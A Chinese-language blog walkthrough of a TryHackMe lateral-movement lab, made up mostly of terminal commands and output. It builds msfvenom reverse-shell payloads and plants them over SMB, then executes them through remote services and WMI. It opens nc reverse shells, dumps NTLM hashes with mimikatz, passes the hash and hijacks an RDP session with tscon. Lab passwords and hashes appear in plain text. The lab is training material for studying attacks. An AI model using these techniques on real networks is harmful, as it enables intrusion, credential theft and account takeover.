【THM Walkthrough】Lateral Movement and Pivoting (1)

Posted by KexconT on 2024-02-08

Lateral Movement and Pivoting

Task 2 Spawning Processes Remotely


└─$ sudo openvpn Lateral_1.ovpn                                                               
[sudo] password for kali: 
2023-12-10 03:36:58 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2023-12-10 03:36:58 Note: cipher 'AES-256-CBC' in --data-ciphers is not supported by ovpn-dco, disabling data channel offload.
2023-12-10 03:36:58 OpenVPN 2.6.3 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2023-12-10 03:36:58 library versions: OpenSSL 3.0.11 19 Sep 2023, LZO 2.10
2023-12-10 03:36:58 DCO version: N/A
2023-12-10 03:36:58 TCP/UDP: Preserving recently used remote address: [AF_INET]
2023-12-10 03:36:58 Socket Buffers: R=[131072->131072] S=[16384->16384]
2023-12-10 03:36:58 Attempting to establish TCP connection with [AF_INET]
2023-12-10 03:36:58 TCP connection established with [AF_INET]
2023-12-10 03:36:58 TCPv4_CLIENT link local: (not bound)
2023-12-10 03:36:58 TCPv4_CLIENT link remote: [AF_INET]
2023-12-10 03:36:58 TLS: Initial packet from [AF_INET], sid=791b7a46 d51f9544
2023-12-10 03:36:59 VERIFY OK: depth=1, CN=ChangeMe
2023-12-10 03:36:59 VERIFY KU OK
2023-12-10 03:36:59 Validating certificate extended key usage
2023-12-10 03:36:59 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
2023-12-10 03:36:59 VERIFY EKU OK
2023-12-10 03:36:59 VERIFY OK: depth=0, CN=server
2023-12-10 03:36:59 Control Channel: TLSv1.3, cipher TLSv1.3 TLS_AES_256_GCM_SHA384, peer certificate: 2048 bit RSA, signature: RSA-SHA256
2023-12-10 03:36:59 [server] Peer Connection Initiated with [AF_INET]
2023-12-10 03:36:59 TLS: move_session: dest=TM_ACTIVE src=TM_INITIAL reinit_src=1
2023-12-10 03:36:59 TLS: tls_multi_process: initial untrusted session promoted to trusted
2023-12-10 03:37:00 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
2023-12-10 03:37:01 PUSH: Received control message: 'PUSH_REPLY,route,route-metric 1000,route-gateway,topology subnet,ping 5,ping-restart 120,ifconfig,peer-id 0'
2023-12-10 03:37:01 OPTIONS IMPORT: --ifconfig/up options modified
2023-12-10 03:37:01 OPTIONS IMPORT: route options modified
2023-12-10 03:37:01 OPTIONS IMPORT: route-related options modified
2023-12-10 03:37:01 Using peer cipher 'AES-256-CBC'
2023-12-10 03:37:01 net_route_v4_best_gw query: dst


接下來是把DC網址加入kali的DNS server:


└─$ sudo systemctl restart NetworkManager                                                     
[sudo] password for kali:


用指令ssh za\\roger.baxter@thmjmp2.za.tryhackme.com,之後會讓你輸入上圖給的Password,thmjmp2就是我們的跳板:

Microsoft Windows [Version 10.0.14393]                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                            

za\roger.baxter@THMJMP2 C:\Users\roger.baxter>

msfvenom生成可以連回攻擊機4444 port的惡意程式myservice.exe:

└─$ msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST= LPORT=4444 -o myservice.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe-service file: 15872 bytes
Saved as: myservice.exe


└─$ smbclient -c 'put myservice.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' EZpass4ever
Password for [ZA\t1_leonard.summers]:
putting file myservice.exe as \myservice.exe (10.0 kb/s) (average 10.0 kb/s)

使用msf來監聽本機的4444 port,-q可以跳過logo畫面,-x參數後面可以接預定要打的msf指令。

└─$ msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST; set LPORT 4444;exploit"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/shell/reverse_tcp
LPORT => 4444
[*] Started reverse TCP handler on

利用nc來監聽本機的4443 port。

└─$ nc -nlvp 4443
listening on [any] 4443 ...

在thmjp2這台跳板上以t1_leonard.summers的身分,在4443 port上反彈shell。

za\roger.baxter@THMJMP2 C:\Users\roger.baxter>runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe 4443"                                                                        
Enter the password for ZA.TRYHACKME.COM\t1_leonard.summers:                                                     
Attempting to start c:\tools\nc64.exe -e cmd.exe 4443 as user "ZA.TRYHACKME.COM\t1_leonard.summers
" ...


└─$ nc -nlvp 4443
listening on [any] 4443 ...
connect to [] from (UNKNOWN) [] 61478
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>sc.exe \\thmiis.za.tryhackme.com create THMservice-3249 binPath= "%windir%\myservice.exe" start= auto
sc.exe \\thmiis.za.tryhackme.com create THMservice-3249 binPath= "%windir%\myservice.exe" start= auto
[SC] CreateService FAILED 1073:

The specified service already exists.


C:\Windows\system32>sc.exe \\thmiis.za.tryhackme.com start THMservice-3249
sc.exe \\thmiis.za.tryhackme.com start THMservice-3249

SERVICE_NAME: THMservice-3249 
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 4  RUNNING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 3132
        FLAGS              :


└─$ msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST; set LPORT 4444;exploit"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/shell/reverse_tcp
LPORT => 4444
[*] Started reverse TCP handler on 
[*] Sending stage (240 bytes) to
[*] Command shell session 1 opened ( -> at 2023-12-10 04:52:00 -0500

Shell Banner:
Microsoft Windows [Version 10.0.17763.1098]



C:\Windows\system32>cd ..
cd ..

C:\Windows>cd ..
cd ..

C:\>cd Users/
cd Users/

 Volume in drive C is Windows
 Volume Serial Number is 1634-22A9

 Directory of C:\Users

2022/06/15  16:31    <DIR>          .
2022/06/15  16:31    <DIR>          ..
2022/02/27  10:45    <DIR>          .NET v2.0
2022/02/27  10:45    <DIR>          .NET v2.0 Classic
2022/02/27  10:45    <DIR>          .NET v4.5
2022/02/27  10:45    <DIR>          .NET v4.5 Classic
2022/02/28  21:15    <DIR>          Administrator
2022/04/30  07:41    <DIR>          Administrator.ZA
2022/02/27  10:45    <DIR>          Classic .NET AppPool
2020/03/21  20:25    <DIR>          Public
2022/03/06  18:53    <DIR>          svcFileCopy
2022/04/27  16:34    <DIR>          t1_corine.waters
2022/04/27  16:27    <DIR>          t1_leonard.summers
2022/06/15  16:31    <DIR>          t1_thomas.moore
2022/04/27  16:46    <DIR>          t1_toby.beck
2022/03/20  14:54    <DIR>          vagrant
               0 File(s)              0 bytes
              16 Dir(s)  46�522�306�560 bytes free

C:\Users>cd t1_leonard.summers
cd t1_leonard.summers

C:\Users\t1_leonard.summers>cd Desktop
cd Desktop

 Volume in drive C is Windows
 Volume Serial Number is 1634-22A9

 Directory of C:\Users\t1_leonard.summers\Desktop

2022/06/17  17:41    <DIR>          .
2022/06/17  17:41    <DIR>          ..
2022/06/17  17:40            58�368 Flag.exe
               1 File(s)         58�368 bytes
               2 Dir(s)  46�522�302�464 bytes free


Task 3 Moving Laterally Using WMI

先用ssh za\\arthur.campbell@thmjmp2.za.tryhackme.com:

Microsoft Windows [Version 10.0.14393]                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                            

za\arthur.campbell@THMJMP2 C:\Users\arthur.campbell>


└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT=4445 -f msi > myinstaller.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes

└─$ ls -al
total 204
drwxr-xr-x 2 kali kali   4096 Dec 14 20:13 .
drwxr-xr-x 8 kali kali   4096 Dec 10 01:11 ..
-rw-r--r-- 1 kali kali   8402 Dec 10 01:11 Lateral_1.ovpn
-rw-r--r-- 1 kali kali   8403 Dec 14 20:11 Lateral_2.ovpn
-rw-r--r-- 1 kali kali 159744 Dec 14 20:19 myinstaller.msi
-rw-r--r-- 1 kali kali  15872 Dec 10 03:48 myservice.exe

使用t1_corine.waters這個帳號,把惡意程式上傳到靶機上的ADMIN$共享,路徑是C:\Windows\,Korine.1994是t1_corine.waters的密碼。之後在攻擊機上開啟監聽4445 port。

└─$ smbclient -c 'put myinstaller.msi' -U t1_corine.waters -W ZA '//thmiis.za.tryhackme.com/admin$/' Korine.1994 
Password for [ZA\t1_corine.waters]:
putting file myinstaller.msi as \myinstaller.msi (48.9 kb/s) (average 48.9 kb/s)

└─$ msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST; set LPORT 4445;exploit"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/shell/reverse_tcp
LPORT => 4445
[*] Started reverse TCP handler on


└─$ msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/shell_reverse_tcp; set LHOST; set LPORT 4445;exploit"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/x64/shell_reverse_tcp
LPORT => 4445
[*] Started reverse TCP handler on 
[*] Command shell session 1 opened ( -> at 2023-12-14 21:04:15 -0500

Shell Banner:
Microsoft Windows [Version 10.0.17763.1098]



za\arthur.campbell@THMJMP2 C:\Users\arthur.campbell>cd ..                                                       

za\arthur.campbell@THMJMP2 C:\Users>cd ..                                                                       

za\arthur.campbell@THMJMP2 C:\>powershell                                                                       
Windows PowerShell                                                                                              
Copyright (C) 2016 Microsoft Corporation. All rights reserved.                                                  

PS C:\> $username = 't1_corine.waters';                                                                         
PS C:\> $password = 'Korine.1994';                                                                              
PS C:\> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;                                 
PS C:\> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;          
PS C:\> $Opt = New-CimSessionOption -Protocol DCOM                                                              
PS C:\> $Session = New-Cimsession -ComputerName thmiis.za.tryhackme.com -Credential $credential -SessionOption $Opt -ErrorAction Stop                                                                                           
PS C:\> Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\myinstaller.msi"; Options = ""; AllUsers = $false}                                        

ReturnValue PSComputerName                                                                                      
----------- --------------                                                                                      
       1603 thmiis.za.tryhackme.com


C:\Windows\system32>cd ..
cd ..
C:\Windows>cd ..
ccd ..
'ccd' is not recognized as an internal or external command,
operable program or batch file.

C:\Windows>cd ..
cd ..

C:\>cd C:\Users\t1_corine.waters\Desktop
cd C:\Users\t1_corine.waters\Desktop

 Volume in drive C is Windows
 Volume Serial Number is 1634-22A9

 Directory of C:\Users\t1_corine.waters\Desktop

2022/06/17  17:52    <DIR>          .
2022/06/17  17:52    <DIR>          ..
2022/06/17  17:52            58�368 Flag.exe
               1 File(s)         58�368 bytes
               2 Dir(s)  46�537�977�856 bytes free

'.' is not recognized as an internal or external command,
operable program or batch file.


Task 5 Use of Alternate Authentication Material

先用ssh za\\tracey.turner@thmjmp2.za.tryhackme.com連過去,看看有什麼東西。

Microsoft Windows [Version 10.0.14393]                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                            

za\tracey.turner@THMJMP2 C:\Users\tracey.turner>cd ..                                                           

za\tracey.turner@THMJMP2 C:\Users>cd ..                                                                         

za\tracey.turner@THMJMP2 C:\>cd Tools                                                                           

za\tracey.turner@THMJMP2 C:\tools>dir                                                                           
 Volume in drive C has no label.                                                                                
 Volume Serial Number is F4B0-FCB9                                                                              

 Directory of C:\tools                                                                                          

12/14/2023  10:54 AM    <DIR>          .                                                                        
12/14/2023  10:54 AM    <DIR>          ..                                                                       
08/10/2021  03:22 PM         1,355,680 mimikatz.exe                                                             
06/14/2022  08:27 PM            45,272 nc64.exe                                                                 
04/19/2022  09:17 PM         1,078,672 PsExec64.exe                                                             
03/16/2022  05:19 PM           906,752 SharpHound.exe                                                           
06/19/2022  05:38 AM    <DIR>          socat                                                                    
12/14/2023  10:54 AM             1,583 [0;1dd90f]-2-0-40e10000-t2_felicia.dean@krbtgt-ZA.TRYHACKME.COM.kirbi    
12/14/2023  10:54 AM             1,647 [0;3e4]-0-0-40a50000-THMJMP2$@ldap-THMDC.za.tryhackme.com.kirbi          
12/14/2023  10:54 AM             1,609 [0;3e4]-0-1-40a50000-THMJMP2$@DNS-thmdc.za.tryhackme.com.kirbi           
12/14/2023  10:54 AM             1,611 [0;3e4]-0-2-40a50000-THMJMP2$@ldap-THMDC.za.tryhackme.com.kirbi          
12/14/2023  10:54 AM             1,615 [0;3e4]-0-3-40a10000-THMJMP2$@host-THMJMP2.za.tryhackme.com.kirbi        
12/14/2023  10:54 AM             1,611 [0;3e4]-0-4-40a50000-THMJMP2$@cifs-THMDC.za.tryhackme.com.kirbi          
12/14/2023  10:54 AM             1,497 [0;3e4]-2-0-60a10000-THMJMP2$@krbtgt-ZA.TRYHACKME.COM.kirbi              
12/14/2023  10:54 AM             1,497 [0;3e4]-2-1-40e10000-THMJMP2$@krbtgt-ZA.TRYHACKME.COM.kirbi              
12/14/2023  10:54 AM             1,647 [0;3e7]-0-0-40a50000-THMJMP2$@cifs-THMDC.za.tryhackme.com.kirbi          
12/14/2023  10:16 AM             1,647 [0;3e7]-0-0-40a50000-THMJMP2$@ldap-THMDC.za.tryhackme.com.kirbi          
12/14/2023  10:54 AM             1,571 [0;3e7]-0-1-40a10000.kirbi                                               
12/14/2023  10:54 AM             1,647 [0;3e7]-0-2-40a50000-THMJMP2$@ldap-THMDC.za.tryhackme.com.kirbi          
12/14/2023  10:54 AM             1,593 [0;3e7]-1-0-00a10000.kirbi                                               
12/14/2023  10:16 AM             1,497 [0;3e7]-2-0-40e10000-THMJMP2$@krbtgt-ZA.TRYHACKME.COM.kirbi              
12/14/2023  10:54 AM             1,497 [0;3e7]-2-0-60a10000-THMJMP2$@krbtgt-ZA.TRYHACKME.COM.kirbi              
12/14/2023  10:54 AM             1,497 [0;3e7]-2-1-40e10000-THMJMP2$@krbtgt-ZA.TRYHACKME.COM.kirbi              
12/14/2023  10:54 AM             1,685 [0;44c599]-0-0-40a10000-t1_toby.beck@HTTP-thmiis.za.tryhackme.com.kirbi  
12/14/2023  10:54 AM             1,569 [0;44c599]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi       
12/14/2023  10:54 AM             1,587 [0;5ffc2]-1-0-40a10000-THMJMP2$@host-THMJMP2.za.tryhackme.com.kirbi      
12/14/2023  10:54 AM             1,587 [0;60056]-1-0-40a10000-THMJMP2$@host-THMJMP2.za.tryhackme.com.kirbi      
12/14/2023  10:54 AM             1,587 [0;87f24]-1-0-40a10000-THMJMP2$@host-THMJMP2.za.tryhackme.com.kirbi      
12/14/2023  10:54 AM             1,719 [0;8d1d3]-0-0-40a50000-t1_toby.beck@LDAP-THMDC.za.tryhackme.com.kirbi    
12/14/2023  10:54 AM             1,569 [0;8d1d3]-2-0-40e10000-t1_toby.beck@krbtgt-ZA.TRYHACKME.COM.kirbi        
              27 File(s)      3,422,945 bytes                                                                   
               3 Dir(s)   9,091,719,168 bytes free

先在本機上監聽5555 port:

└─$ nc -nlvp 5555
listening on [any] 5555 ...


用t2_felicia.dean / iLov3THM試試:

Microsoft Windows [Version 10.0.14393]                                                                          
(c) 2016 Microsoft Corporation. All rights reserved.                                                            

za\t2_felicia.dean@THMJMP2 C:\Users\t2_felicia.dean>cd ..                                                       

za\t2_felicia.dean@THMJMP2 C:\Users>cd ..                                                                       

za\t2_felicia.dean@THMJMP2 C:\>cd Tools                                                                         

za\t2_felicia.dean@THMJMP2 C:\tools>mimikatz                                                                    

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53                                                    
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                                                                     
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )                                        
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz                                                         
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )                                       
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/                                       

mimikatz # privilege::debug                                                                                     
Privilege '20' OK


mimikatz # sekurlsa::msv                                                                                        

Authentication Id : 0 ; 2263970 (00000000:00228ba2)                                                             
Session           : NetworkCleartext from 0                                                                     
User Name         : t2_felicia.dean                                                                             
Domain            : ZA                                                                                          
Logon Server      : THMDC                                                                                       
Logon Time        : 12/15/2023 8:59:36 AM                                                                       
SID               : S-1-5-21-3330634377-1326264276-632209373-4605                                               
        msv :                                                                                                   
         [00000003] Primary                                                                                     
         * Username : t2_felicia.dean                                                                           
         * Domain   : ZA                                                                                        
         * NTLM     : 7806fea66c81806b5dc068484b4567f6                                                          
         * SHA1     : b5c06a36f629a624e4adce09bd59e5f99c90a9a7                                                  
         * DPAPI    : e375158311db4a6357c3e3921cd42e7e                                                          

Authentication Id : 0 ; 1865257 (00000000:001c7629)                                                             
Session           : Service from 0                                                                              
User Name         : sshd_1352                                                                                   
Domain            : VIRTUAL USERS                                                                               
Logon Server      : (null)                                                                                      
Logon Time        : 12/15/2023 8:42:15 AM                                                                       
SID               : S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-1352                          
        msv :                                                                                                   
         [00000003] Primary                                                                                     
         * Username : THMJMP2$                                                                                  
         * Domain   : ZA                                                                                        
         * NTLM     : f5f7f80969cf3c13323a1530ba89a91f                                                          
         * SHA1     : 931c1ce23ed23c781dcadc04ddfff5d4291a028c                                                  

Authentication Id : 0 ; 920004 (00000000:000e09c4)                                                              
Session           : Interactive from 6                                                                          
User Name         : DWM-6                                                                                       
Domain            : Window Manager                                                                              
Logon Server      : (null)                                                                                      
Logon Time        : 12/15/2023 8:20:03 AM                                                                       
SID               : S-1-5-90-0-6                                                                                
        msv :                                                                                                   
         [00000003] Primary                                                                                     
         * Username : THMJMP2$                                                                                  
         * Domain   : ZA                                                                                        
         * NTLM     : f5f7f80969cf3c13323a1530ba89a91f                                                          
         * SHA1     : 931c1ce23ed23c781dcadc04ddfff5d4291a028c                                                  

Authentication Id : 0 ; 836438 (00000000:000cc356)                                                              
Session           : RemoteInteractive from 5                                                                    
User Name         : t1_toby.beck                                                                                
Domain            : ZA                                                                                          
Logon Server      : THMDC                                                                                       
Logon Time        : 12/15/2023 8:19:52 AM                                                                       
SID               : S-1-5-21-3330634377-1326264276-632209373-4607                                               
        msv :                                                                                                   
         [00000003] Primary                                                                                     
         * Username : t1_toby.beck                                                                              
         * Domain   : ZA                                                                                        
         * NTLM     : 533f1bd576caa912bdb9da284bbc60fe                                                          
         * SHA1     : 8a65216442debb62a3258eea4fbcbadea40ccc38                                                  
         * DPAPI    : d9cd92937c7401805389fbb51260c45f                                                          


Authentication Id : 0 ; 487747 (00000000:00077143)                                                              
Session           : RemoteInteractive from 4                                                                    
User Name         : t1_toby.beck5                                                                               
Domain            : ZA                                                                                          
Logon Server      : THMDC                                                                                       
Logon Time        : 12/15/2023 8:11:01 AM                                                                       
SID               : S-1-5-21-3330634377-1326264276-632209373-4620                                               
        msv :                                                                                                   
         [00000003] Primary                                                                                     
         * Username : t1_toby.beck5                                                                             
         * Domain   : ZA                                                                                        
         * NTLM     : 533f1bd576caa912bdb9da284bbc60fe                                                          
         * SHA1     : 8a65216442debb62a3258eea4fbcbadea40ccc38                                                  
         * DPAPI    : 0537b9105954f5d1d1bc2f1763d86fd6                                                          

Authentication Id : 0 ; 996 (00000000:000003e4)                                                                 
Session           : Service from 0                                                                              
User Name         : THMJMP2$                                                                                    
Domain            : ZA                                                                                          
Logon Server      : (null)                                                                                      
Logon Time        : 12/15/2023 8:09:27 AM                                                                       
SID               : S-1-5-20                                                                                    
        msv :                                                                                                   
         [00000003] Primary                                                                                     
         * Username : THMJMP2$                                                                                  
         * Domain   : ZA                                                                                        
         * NTLM     : f5f7f80969cf3c13323a1530ba89a91f                                                          
         * SHA1     : 931c1ce23ed23c781dcadc04ddfff5d4291a028c                                                  


Authentication Id : 0 ; 1018097 (00000000:000f88f1)                                                             
Session           : RemoteInteractive from 7                                                                    
User Name         : t1_toby.beck2                                                                               
Domain            : ZA                                                                                          
Logon Server      : THMDC                                                                                       
Logon Time        : 12/15/2023 8:20:15 AM                                                                       
SID               : S-1-5-21-3330634377-1326264276-632209373-4617                                               
        msv :                                                                                                   
         [00000003] Primary                                                                                     
         * Username : t1_toby.beck2                                                                             
         * Domain   : ZA                                                                                        
         * NTLM     : 533f1bd576caa912bdb9da284bbc60fe                                                          
         * SHA1     : 8a65216442debb62a3258eea4fbcbadea40ccc38                                                  
         * DPAPI    : 4350e787e87478881a14c357350ffb6e                                                          

Authentication Id : 0 ; 926637 (00000000:000e23ad)                                                              
Session           : RemoteInteractive from 6                                                                    
User Name         : t1_toby.beck1                                                                               
Domain            : ZA                                                                                          
Logon Server      : THMDC                                                                                       
Logon Time        : 12/15/2023 8:20:04 AM                                                                       
SID               : S-1-5-21-3330634377-1326264276-632209373-4616                                               
        msv :                                                                                                   
         [00000003] Primary                                                                                     
         * Username : t1_toby.beck1                                                                             
         * Domain   : ZA                                                                                        
         * NTLM     : 533f1bd576caa912bdb9da284bbc60fe                                                          
         * SHA1     : 8a65216442debb62a3258eea4fbcbadea40ccc38                                                  
         * DPAPI    : 489fed8eeb5acc4ffb205663491b62d3                                                          

Authentication Id : 0 ; 399671 (00000000:00061937)                                                              
Session           : RemoteInteractive from 3                                                                    
User Name         : t1_toby.beck4                                                                               
Domain            : ZA                                                                                          
Logon Server      : THMDC                                                                                       
Logon Time        : 12/15/2023 8:10:50 AM                                                                       
SID               : S-1-5-21-3330634377-1326264276-632209373-4619                                               
        msv :                                                                                                   
         [00000003] Primary                                                                                     
         * Username : t1_toby.beck4                                                                             
         * Domain   : ZA                                                                                        
         * NTLM     : 533f1bd576caa912bdb9da284bbc60fe                                                          
         * SHA1     : 8a65216442debb62a3258eea4fbcbadea40ccc38                                                  
         * DPAPI    : 47d511de8e208dc0053e88223dcdd31c                                                          

Authentication Id : 0 ; 309031 (00000000:0004b727)                                                              
Session           : RemoteInteractive from 2                                                                    
User Name         : t1_toby.beck3                                                                               
Domain            : ZA                                                                                          
Logon Server      : THMDC                                                                                       
Logon Time        : 12/15/2023 8:10:40 AM                                                                       
SID               : S-1-5-21-3330634377-1326264276-632209373-4618                                               
        msv :                                                                                                   
         [00000003] Primary                                                                                     
         * Username : t1_toby.beck3                                                                             
         * Domain   : ZA                                                                                        
         * NTLM     : 533f1bd576caa912bdb9da284bbc60fe                                                          
         * SHA1     : 8a65216442debb62a3258eea4fbcbadea40ccc38                                                  
         * DPAPI    : 20fa99221aff152851ce37bcd510e61e                                                          

token::elevate是假冒token,用於提升到SYSTEM權限,或是發現電腦中的DC token。token::revert來重新建立我們的原始token特權,因為直接嘗試使用已升級的token來進行pass the hash是不起作用的。

mimikatz # token::elevate                                                                                       
Token Id  : 0                                                                                                   
User name :                                                                                                     
SID name  : NT AUTHORITY\SYSTEM                                                                                 

504     {0;000003e7} 1 D 16900          NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Primary         
 -> Impersonated !                                                                                              
 * Process Token : {0;00228ba2} 0 D 2295414     ZA\t2_felicia.dean      S-1-5-21-3330634377-1326264276-632209373
-4605   (12g,24p)       Primary                                                                                 
 * Thread Token  : {0;000003e7} 1 D 2612822     NT AUTHORITY\SYSTEM     S-1-5-18        (04g,21p)       Imperson
ation (Delegation)                                                                                              

mimikatz # token::revert                                                                                        
 * Process Token : {0;00228ba2} 0 D 2295414     ZA\t2_felicia.dean      S-1-5-21-3330634377-1326264276-632209373
-4605   (12g,24p)       Primary                                                                                 
 * Thread Token  : no token

用剛剛sekurlsa::msv導出來的t1_toby.beck來進行pass the hash,並接上/run參數來執行nc,連回攻擊機的5555 port:

sekurlsa::pth /user:t1_toby.beck /domain:za.tryhackme.com /ntlm:533f1bd576caa912bdb9da284bbc60fe /run:"c:\tools\nc64.exe -e cmd.exe 5555"

mimikatz # sekurlsa::pth /user:t1_toby.beck /domain:za.tryhackme.com /ntlm:533f1bd576caa912bdb9da284bbc60fe /run
:"c:\tools\nc64.exe -e cmd.exe 5555"                                                                
user    : t1_toby.beck                                                                                          
domain  : za.tryhackme.com                                                                                      
program : c:\tools\nc64.exe -e cmd.exe 5555                                                         
impers. : no                                                                                                    
NTLM    : 533f1bd576caa912bdb9da284bbc60fe                                                                      
  |  PID  2104                                                                                                  
  |  TID  4016                                                                                                  
  |  LSA Process is now R/W                                                                                     
  |  LUID 0 ; 2619712 (00000000:0027f940)                                                                       
  \_ msv1_0   - data copy @ 00000247EF2355C0 : OK !                                                             
  \_ kerberos - data copy @ 00000247EF655298                                                                    
   \_ aes256_hmac       -> null                                                                                 
   \_ aes128_hmac       -> null                                                                                 
   \_ rc4_hmac_nt       OK                                                                                      
   \_ rc4_hmac_old      OK                                                                                      
   \_ rc4_md4           OK                                                                                      
   \_ rc4_hmac_nt_exp   OK                                                                                      
   \_ rc4_hmac_old_exp  OK                                                                                      
   \_ *Password replace @ 00000247EF645A68 (32) -> null                                                         

mimikatz #


└─$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 65041
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.


Task 6 Abusing User Behaviour



└─$ xfreerdp /v:thmjmp2.za.tryhackme.com /u:t2_kelly.blake /p:8LXuPeNHZFFG +clipboard
[06:14:21:160] [255447:255448] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[06:14:21:160] [255447:255448] [WARN][com.freerdp.crypto] - CN = THMJMP2.za.tryhackme.com
Certificate details for thmjmp2.za.tryhackme.com:3389 (RDP-Server):
        Common Name: THMJMP2.za.tryhackme.com
        Subject:     CN = THMJMP2.za.tryhackme.com
        Issuer:      CN = THMJMP2.za.tryhackme.com
        Thumbprint:  db:ed:9e:78:e7:0c:56:77:c7:d1:82:60:b1:5d:6a:ae:70:e7:b0:c9:7e:70:0d:b7:b0:87:b0:f4:f6:a5:2e:9d
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
[06:14:31:810] [255447:255448] [INFO][com.freerdp.gdi] - Local framebuffer format  PIXEL_FORMAT_BGRX32
[06:14:31:811] [255447:255448] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[06:14:31:866] [255447:255448] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[06:14:31:867] [255447:255448] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[06:14:32:734] [255447:255448] [INFO][com.freerdp.client.x11] - Logon Error Info LOGON_WARNING [LOGON_MSG_SESSION_CONTINUE]





C:\tools>PsExec64.exe -s cmd.exe

PsExec v2.34 - Execute processes remotely
Copyright (C) 2001-2021 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>query user
 t1_toby.beck5                             2  Disc            8  12/15/2023 11:13 AM
 t2_kelly.blake        rdp-tcp#4           3  Active          .  12/15/2023 11:14 AM

tscon 2 /dest:rdp-tcp#4

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